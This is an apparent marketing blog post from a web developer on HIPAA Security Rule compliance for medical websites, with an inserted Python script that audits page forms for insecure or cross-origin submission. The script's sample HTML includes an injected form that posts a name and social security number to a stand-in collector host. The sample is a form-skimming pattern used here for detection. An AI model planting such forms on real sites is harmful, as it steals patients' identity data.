Is your Medical Website HIPAA-Compliant?

by | Jun 17, 2019 | HIPAA


HIPAA Security Rule


If you're a medical professional, you are probably familiar with HIPAA (the Health Insurance Portability and Accountability Act of 1996) and with the HIPAA Privacy Rule. But are you familiar with the HIPAA Security Rule? The Security Standards for the Protection of Electronic Protected Health Information set national standards for safeguarding health information that is created, received, maintained or transmitted in electronic form, known as e-PHI. As more medical practices build websites that collect PHI, it is important to understand what e-PHI is and how to determine whether your site needs to be HIPAA-compliant. Comit Developers has been building HIPAA-compliant websites since 2004 and is well-versed in the HIPAA requirements; read on to learn how we can help your practice stay compliant and attract patients with our SEO services.

What is e-PHI?

According to the U.S. Department of Health & Human Services, Electronic Protected Health Information (e-PHI) is "all individually identifiable health information a covered entity creates, receives, maintains or transmits in electronic form." What does that mean in practice? If your website collects, stores or transmits any information that identifies a patient and relates to their health, care or payment for care, that data is e-PHI.

This can include:

  • Patient names, addresses, phone numbers, social security numbers
  • Patient photographs, X-Rays, MRIs
  • Past medical records
  • Patient payment information and insurance data
  • Patient demographics
  • Tests and lab results

The HIPAA Security Rule spells out how this information must be protected, and the team at Comit Developers can help ensure that your organization stays in compliance.

Does my website need to be HIPAA-compliant?

If you collect any of the above information through your website, then yes: your website needs to be HIPAA-compliant, and the PHI it handles must be protected.

Ways your medical website may be collecting PHI include:

  • Online scheduling of appointments
  • Contact your doctor with questions
  • Online payments
  • Patient onboarding

The bottom line is that if you handle any patient data through your website, the Security Rule's safeguards apply to that data, and a website that does not meet them puts you in violation. Even if you collect no patient data, you should strongly consider building the site to the same standard. A site on HIPAA-compliant hosting (servers that meet the requirements of the HIPAA Security Rule), with tight access controls, is harder to compromise, which reduces (though does not eliminate) the risk of an attacker injecting fake forms into your pages to harvest data such as social security numbers.

How do I know if my site meets the standards of the HIPAA Security Rule?

If you can answer yes to all of the questions below, your medical site probably meets the technical standards of the HIPAA Security Rule. Keep in mind that the Security Rule also requires a documented risk analysis and written policies, so the checklist is a starting point rather than a guarantee of compliance.

  • Does your site have automatic backups that are retained reliably and that you have tested restoring?
  • Is all data transmitted between your site and its visitors encrypted in transit (for example, HTTPS with TLS on every page, not just the forms)?
  • Is your stored data also encrypted at rest?
  • Is your website data accessible only by authorized persons, each with a unique login and permissions, with access that can be audited?
  • If your site is no longer needed, can its data be permanently deleted?
  • Do you have a HIPAA Business Associate Agreement (BAA) with the company that currently hosts your website? A host that stores or transmits e-PHI on your behalf is a business associate and must sign a BAA; a server that merely looks secure does not substitute for one. Learn more about Comit Developers' HIPAA-compliant web hosting solutions.
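Two items above, encrypted transmission and the risk of injected fake forms, can be checked mechanically against a page's HTML. The following script is an added example written for this article; it is not code from Comit Developers or from any hosting product. It parses a page's forms and flags any form that submits over plain HTTP, posts to a different origin than the page (the pattern an injected data-harvesting form typically shows), or sends sensitive-looking fields via GET. The page URL, the HTML and the list of sensitive field names are constructed for the example.

```python
"""Audit a page's HTML for forms that could expose PHI.

Added example (not from the original article). Sample URL and HTML below are
constructed for illustration; the sensitive-name list is an assumption.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumed substrings that mark a field as carrying PHI or payment data.
SENSITIVE_NAMES = {"ssn", "social", "dob", "insurance", "diagnosis", "card"}


class FormCollector(HTMLParser):
    """Collects each <form> with its action, method and input names."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(page_url, html):
    """Return a list of findings, one per form with at least one issue."""
    parser = FormCollector()
    parser.feed(html)
    page = urlsplit(page_url)
    findings = []
    for index, form in enumerate(parser.forms):
        # An empty action submits back to the page itself.
        target = urlsplit(urljoin(page_url, form["action"]))
        sensitive = [n for n in form["fields"] if any(k in n for k in SENSITIVE_NAMES)]
        issues = []
        if target.scheme != "https":
            issues.append("submits over plain HTTP")
        if target.netloc != page.netloc:
            issues.append(f"posts to foreign origin {target.netloc}")
        if sensitive and form["method"] != "post":
            issues.append("sends sensitive fields via GET (lands in URL and server logs)")
        if issues:
            findings.append({
                "form": index,
                "action": target.geturl(),
                "sensitive_fields": sensitive,
                "issues": issues,
            })
    return findings


# Constructed sample: a legitimate appointment form, an injected form that
# ships an SSN to a foreign host over HTTP, a harmless search box, and an
# intake form that leaks an insurance ID through a GET query string.
SAMPLE_URL = "https://practice.example/contact"
SAMPLE_HTML = """
<form action="/appointments" method="post">
  <input name="patient_name"><input name="phone">
</form>
<form action="http://collector.invalid/steal" method="post">
  <input name="full_name"><input name="ssn">
</form>
<form action="/search" method="get"><input name="q"></form>
<form action="/intake" method="get"><input name="insurance_id"></form>
"""

if __name__ == "__main__":
    for finding in audit_forms(SAMPLE_URL, SAMPLE_HTML):
        print(finding)
```

Run it against the HTML of each page that carries a form; the injected form (index 1) and the GET intake form (index 3) are reported, while the appointment form and the search box pass. A same-origin HTTPS form passing this check still says nothing about what the server does with the data once it arrives, which is what the remaining checklist items cover.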

Ready to learn more about the HIPAA Security Rule?

Comit Developers is well-versed in the requirements surrounding the HIPAA Security Rule, and our team has put in countless hours researching the best available solutions in order to provide our healthcare clients with secure, HIPAA-compliant websites. As a result, we have successfully launched many sites on HIPAA-compliant servers for customers in the medical industry, including doctors, surgeons, dentists, DME suppliers and breast pump providers. Our team has extensive training on HIPAA requirements and can help you stay secure and compliant.

To work with a professional team, well-versed in providing HIPAA-compliant websites, call us at 337-326-5479 to get started!
